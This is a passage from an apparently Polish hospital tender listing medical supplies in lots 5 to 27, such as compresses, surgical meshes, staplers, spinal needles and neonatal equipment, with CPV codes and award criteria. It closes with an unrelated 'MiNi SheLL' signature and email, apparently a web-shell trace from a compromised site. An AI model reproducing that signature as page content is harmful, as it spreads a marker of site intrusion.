Jałowe kompresy gazowe 16W z RTG,Roz.10x10cm a 20szt, przwiązane nicią  (2x10). Minimalna waga pojedyńczego kompresu 3,68 g, zapakowane w torebkę papierowo-foliową, oznakowany kierunek otwierania zgodnie z normą PN-EN 868-5 . Na zewnątrz opakowania etykieta z dwiema naklejkami umożliwiającymi wklejenie do dokumentacji z nr lot lub serii, datą ważności, identyfikacją producenta.Materiał gazowy kl 2a Reg 7, sterylizowany w parze wodnej.		op	2000
Jałowe kompresy gazowe 16W z RTG,Roz.10x10cm a 30szt, przwiązane nicią  (3x10). Minimalna waga pojedyńczego kompresu 3,68 g, zapakowane w torebkę papierowo-foliową, oznakowany kierunek otwierania zgodnie z normą PN-EN 868-5 . Na zewnątrz opakowania etykieta z dwiema naklejkami umożliwiającymi wklejenie do dokumentacji z nr lot lub serii, datą ważności, identyfikacją producenta.Materiał gazowy kl 2a Reg 7, sterylizowany w parze wodnej.		op	1800
Jałowe kompresy gazowe 16W z RTG,Roz.10x10cm a 50szt, przwiązane nicią  (5x10). Minimalna waga pojedyńczego kompresu 3,68 g, zapakowane w torebkę papierowo-foliową, oznakowany kierunek otwierania zgodnie z normą PN-EN 868-5 . Na zewnątrz opakowania etykieta z dwiema naklejkami umożliwiającymi wklejenie do dokumentacji z nr lot lub serii, datą ważności, identyfikacją producenta.Materiał gazowy kl 2a Reg 7, sterylizowany w parze wodnej.		op	1500
Jałowe serwety gazowe 17N 4W z RTG +tasiemka ,Roz.45x70cm a 1szt . Zapakowane  w torebkę papierowo-foliową, oznakowany kierunek otwierania zgodnie z normą PN-EN 868-5 .Na zewnątrz opakowania etykieta z dwiema naklejkami umożliwiającymi wklejenie do dokumentacji z nr lot lub serii, datą ważności, identyfikacją producenta.Materiał gazowy kl 2a Reg 7		szt	1500
Jałowy podkład podgipsowy,syntetyczny ,Roz.10cm a 1szt		szt	600
Jałowy podkład podgipsowy,syntetyczny ,Roz.15cm a 1szt		szt	600
Niejałowy podkład podgipsowy,naturalny ,Roz.15cm a 1szt		szt	100
Opaska dziana niesterylna 4x15		szt	300
Opaska elastyczna 5x15		szt	100.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Siatki chirurgiczne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Siatka chirurgiczna monofilamentowa, polipropylenowa, gęstość porów 0,3mmx0,5mm  ciężar pow. 80G/m2 - rozmiar 15cm x 15cm		szt.	15
Siatka chirurgiczna monofilamentowa, polipropylenowa, gęstość porów 0,5mmx0,5mm  ciężar pow. 80g/m2 - rozmiar 8cm x 12cm		szt.	120
Siatka chirurgiczna monofilamentowa, polipropylenowa, gęstość porów 1,16mmx2,6mm  ciężar pow. 36g/m2 - rozmiar 8cm x 12cm		szt.	80
Siatka chirurgiczna monofilamentowa, poloprolenowa, gęstość porów 1,16mmx2,6mm  ciężar pow. 36g/m2 - rozmiar 15cm x 15cm		szt.	10.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Staplery okrężne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Jednorazowy stapler okrężny, z łamanym kowadełkiem po wykonaniu zespolenia, o średnicy 25, 28, 31 mm i wysokością zszywki przed zamknięciem 4,8mm. Stapler posiada dwie dźwignie spustowe. Zamawiający określi rozmiar staplera przy składaniu zamówienia cząstkowego		szt	33
Ładunki ze zintegrowanym kowadełkiem do wielorazowego staplera zamykającego typu TA Premium 55, będącego na wyposażeniu Zamawiającego, o wysokości zszywki przed zamknięciem 3,5 mm lub 4,8 mm w zależności od bieżących zapotrzebowań Zamawiającego 		op	17
Narzędzie laparoskopowe do mocowania siatki przepuklinowej metodą laparoskopową - średnica 5 mm z 30 tytanowymi wkrętami spiralnymi		szt	6
Narzędzie do mocowania siatki przepuklinowej krótkie z 15 tytanowymi wkrętami spiralnymi		szt	10.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.16.22.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Zestawy do szynowania moczowodów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zestaw do szynowania moczowodów typ D-J niesterowalny soft. W skład zestawu wchodzą: cewnik otwarty od strony pęcherza  CH 4,7; atraumatyczna pętla pęcherzowa, drenaż max. 6 miesięcy, wykonany z poliuretanu alifatycznego, widoczny w promieniach RTG. długość 28cm, popychacz dł. 70cm, prowadnik powleczony teflonem dł. 120-125cm, zacisk		szt.	25
Cewnik moczowodowy z zaokrąglonym końcem otwartym, prosty, dł. 70cm, średnica 4Ch, mandryn		szt.	30.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Taśma IVS.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Tasma IVS do leczenia nietrzymania moczu. Materiał - polipropylen monofilamentowy. Atreumatyczne brzegi zakończone pętelkami, grubość taśmy 0,5mm (+/- 0,01mm), porowatość 86% (+/- 1%), gramatura 70 g/m2 (+/-5 g/m2), długość 50cm (+/-1cm), szerokość 1,3 cm (+/-0,05cm)		szt	30.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Nożyczki do episjotomii.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Nożyczki do episiotomi Braun-Stadler 14,5 cm, sterylne jednorazowe narzędzia chirurgiczne wykonane ze stali. Symbol graficzny -do jednorazowego użycia- zgodnie z normą EN 980 umieszczony w sposób trwały na obu stronach narzędzia. Wyr ób zgodny z Dyrektywą UE 93/42/EWG. Wyrób medyczny klasa I reguła 6 
		szt	200.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.16.22.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Igły do znieczuleń.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Igła 22G dł. 88- 90 mm do znieczulenia podpajęczynkówkowego typ standard, ze szlifem Quinkiego, przezroczysty uchwyt lock, uchwyt mandrynu w kolorze odpowiadającym kodowi rozmiarów		szt	20
Igła 21G dł. 88- 90 mm do znieczulenia podpajęczynkówkowego typ standard, ze szlifem Quinkiego, przezroczysty uchwyt lock, uchwyt mandrynu w kolorze odpowiadającym kodowi rozmiarów		szt	60
Igła 20G dł. 88- 90 mm do znieczulenia podpajęczynkówkowego typ standard, ze szlifem Quinkiego, przezroczysty uchwyt lock, uchwyt mandrynu w kolorze odpowiadającym kodowi rozmiarów		op.	140
Igła 18G dł. 88- 90 mm do znieczulenia podpajęczynkówkowego typ standard, ze szlifem Quinkiego, przezroczysty uchwyt lock, uchwyt mandrynu w kolorze odpowiadającym kodowi rozmiarów		szt	80
Igła 19G dł. 88- 90 mm do znieczulenia podpajęczynkówkowego typ standard, ze szlifem Quinkiego, przezroczysty uchwyt lock, uchwyt mandrynu w kolorze odpowiadającym kodowi rozmiarów		szt	100
Igła 26G dł. 88- 90mm do znieczulenia podpajęczynókowego typu Pencil Point z bocznym otworem, przezroczysty uchwyt lock, uchwyt mandrynu w kolorze odpowiadającemu kodowi rozmiarów.		szt	1500
Igła 25G lub 26G dł 120- 130mm do znieczulenia podpajęczynókowego typu Pencil Point z bocznym otworem, przezroczysty uchwyt lock, uchwyt mandrynu w kolorze odpowiadającemu kodowi rozmiarów.		szt	60
Igła 19Gx1 1/2 - 1,1 x 40mm do znieczulenia podpajęczynkówkowego typ standard, ze szlifem Quinkiego, przezroczysty uchwyt lock, uchwyt mandrynu w kolorze odpowiadającym kodowi rozmiarów		szt	10
Igła 22Gx1 1/2 - 0,7 x 40mm do znieczulenia podpajęczynkówkowego typ standard, ze szlifem Quinkiego, przezroczysty uchwyt lock, uchwyt mandrynu w kolorze odpowiadającym kodowi rozmiarów		szt	50.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Zestawy do znieczuleń.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zestaw do znieczulenia zewnątrzoponowego ciągłego z cewnikiem, strzykawką niskooporową i filtrem.Igła Tuohy Strzykawka niskooporowa 10 ml.Cewnik - wykonany z poliamidu, kontrastujący w RTG, 100 cm. Filtr - 0,2mm - wytrzymałość na ciśnienie do 7 bar, mocowanie filtra do skóry pacjenta		szt	60
Zestaw do znieczulenia zewnątrzoponowego ciągłego  i podpajęczynówkowego G 27 x 5 Igła Touhy  i igła ze szlifem Quinckego. Igła  z dolnym otworem na igłę podpajęczą. Strzykawka niskooporowa 10 ml Cewnik - wykonany z poliamidu, kontrastujący w RTG,dł. 100 cm.Filtr - 0,2 mm- wytrzymałość na ciśnienie do 7 bar.		szt	20.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Akcesoria anestezjologiczne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Infuzyjny system pomiaru ośrodkowego ciśnienia żylnego - skala pomiarowa + zestaw drenów 80-100cm 		szt	50
Łącznik karbowany ze złączem rurki 22M/15 zagiętym pod kątem 90 stopni, port odsysania z koreczkiem dł. 15cm		szt	70
Maska aerozolowa dla dorosłych bez drenu		szt	50
Maska krtaniowa jednorazowa, rozmiar 4 i 5, wykonana z PCV		szt	10
Maska tlenowa dla dorosłych, jednorazowa bez zaworu		szt	500
Maska tlenowa pediatryczna z drenem		szt	80
maska tlenowa z drenem  i z workiem		szt	20
Maska tlenowa z drenem 213 cm		szt	80
Maska tlenowa z nebulizatorem		szt	300
Maska z osłoną na oczy		szt	20.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> Drobny sprzęt medyczny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kranik trójdrożny a 50 szt		op	60
Obuwie ochronne foliowe		szt	500
Pensety jednorazowe		szt	150
Zatyczka do cewników schodkowa a 100 szt		op	20.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> Zestawy Redon.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Butelka REDON do długotrwałego odsysania ran 200ml, jednorazowa, sterylna		szt	4000
Zamknięty układ ssący do bezpośredniej autotransfuzji pooperacyjnej, w skład którego wchodzą:                                            -podwójna końcówka uciskowa dla drenów Redona o średnicy zwiększającej schodkowo od CH6 do Ch18 z możliwością podawania w iniekcji antykoagulantów;                      -butelka Redona z przeciw zwrotną zastawką o pojemności 250 ml (początkowe ssanie 120mbar)               		szt	100.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 16 <b>NAZWA:</b> Akcesoria do diatermi chirurgicznej VIO.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Elektroda neutralna jednorazowa dzielona 		szt	2500
Elektroda neutralna jednorazowa niedzielona		szt	300
Kabel monopolarnyVIO, ICC, ACC do intrumentów laparoskopowych do cięcia i koagulacji		szt	12
Uchwyt elektrod monopolarnych z 2 przyciskami, VIO, ICC, ACC STANDARD, z kablem przyłączeniowym dł. 4m		szt	20
Elektroda nożowa, prosta 3,4 x 24 mm wielorazowa 		szt	10
Elektroda nożowa, prosta 0,4 x 10 mm, dł. 100 mm, do głębokich jam ciała 		szt	15
Kleszczyki laparoskopowe BiClamp Laparoskopowe, typu Maryland, okładki radełkowane, płaszcz o średnicy 5mm, długość 340mm, kompatybilne z diatermią VAIO 300 D
		szt	1
Nożyki bipolarne laparoskopowe, końcówki Micro średnica 5 mm, długość 350 mm
		szt	1
Narzędzie do zamykania naczyń BiClamp do laparotomii 200 mm C
		szt	1
Narzędzie BiClamp 270 mm C		szt	1.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 17 <b>NAZWA:</b> Akcesoria neonatologiczne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Jednorazowy układ oddechowy do respiratora Fabian jednorazowego użytku + jednorazowa komora nawilżacza  MR 290 - lub o równorzędnych parametrach		szt	6
Komplet rur jednorazowego użytku do CPAP-u Infant Flow + podgrzewacz wody MR 290		szt	30
Łącznik respiratora do podlaczenia ukladu Infant Flow nCPAP j.u.		szt	5
Maseczka nosowa do aparatu Infant Flow - L		szt	5
Maseczka nosowa do aparatu Infant Flow - M		szt	5
Maseczka nosowa do aparatu Infant Flow - S		szt	5
Okularki do fototerapii noworodka, jednorazowego użytku - wykonane z flizeliny karbowanej, obwód gówy 26-33cm		szt	350
Zestaw do transfuzji wymiennej krwi u noworodka - sterylny, jednorazowy		kpl	2
Przewód tlenowy z maseczką do podawania tlenu dla noworodka 		szt	50
Sonda z zatyczką do karmienia noworodków i wcześniaków 6CH		szt	300
Sonda z zatyczką do karmienia noworodków i wcześniaków 8CH		szt	50.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 18 <b>NAZWA:</b> Strzykawki ŻANETY.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Żanety do płukania przewodu słuchowego. Sterylne, niepirogenne, poj. 100 ml		szt	2000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 19 <b>NAZWA:</b> Pomiar ciśnienia krwi.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przetwornik do inwazyjnego pomiaru ciśnienia. Do monitora DASH 3000 jaki posiada Zamawiający		szt	30
Zestaw do pobierania próbek krwii w układzie zamknietym z przetwornikiem do pomiaru IBP (inwazyjnego ciśnienia krwii)		szt	60.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 20 <b>NAZWA:</b> Zestaw do biopsji aspiracyjnej macicy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zestaw do biopsji aspiracyjnej macicy Gineaspir. W zestawie znajdują się: pipeta zakończona łyżeczką o średnicy 3mm z możliwością łyżeczkowania jany macicy, strzykawka 10ml z zabezpieczeniem cofania tłoka strzykawki, pojemnik na materiał histopatologiczny		szt	50
Zestaw do biopsji aspiracyjnej macicy Gineaspir. W zestawie znajdują się: pipeta zakończona łyżeczką o średnicy 4mm z możliwością łyżeczkowania jany macicy, strzykawka 20ml z zabezpieczeniem cofania tłoka strzykawki, pojemnik na materiał histopatologiczny		szt	150.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 21 <b>NAZWA:</b> Igły do akupunktury.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Igły do akupunktury 0,25x25mm, jednorazowe, sterylne bez prowadnic, opak =100szt		opak	200
Igły do akupunktury 0,25x40mm, jednorazowe, sterylne bez prowadnic, opak =100szt		opak	300.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 22 <b>NAZWA:</b> Sondy sengstakena.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Sonda Sengstakena CH 18, CH 21 sterylna		szt	4.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 23 <b>NAZWA:</b> System do nawilżania.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zamkniety system do nawilżania z głowicą RESPI FLO		szt	100.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 24 <b>NAZWA:</b> Akcesoria medyczne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Butla - słój do ssaka Victoria II, który posiada Zamawiający, pojemność 2 litr		szt	5
Resuscytator silikonowy AMBU, dla dorosłych		szt	5
Rurka intubacyjna dooskrzelowa, dwuświatłowa, prawe oskrzele		szt	1
Rurka intubacyjna dooskrzelowa, dwuświatłowa, lewe oskrzele		szt	2
Rurka LTS, nr 5		szt	2
Mankiet wielorazowy Dura-Cuf standard, dla dorosłych, 23-35 cm		szt	20.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 25 <b>NAZWA:</b> Cewniki dopępowinowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Cewnik dopępowinowy, Ch 4, Ch 5, Ch 6, długość w zakresie 30-40 cm		szt	15.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 26 <b>NAZWA:</b> Cewnik trzustkowy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Cewnik trzustkowy  wielorazowy z krótką zwężaną końcowką średnicy 2,5 f przyjmujący  prowadnice 0,025 posiadający znacznik fluoroskopowy na koncu minimalna długośc roboczą 1950 mm minimalna srednica kanału 2,2		szt	10.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 27 <b>NAZWA:</b> Trójnik ECPW.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Trójnik - łącznik do ECPW		szt	50.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com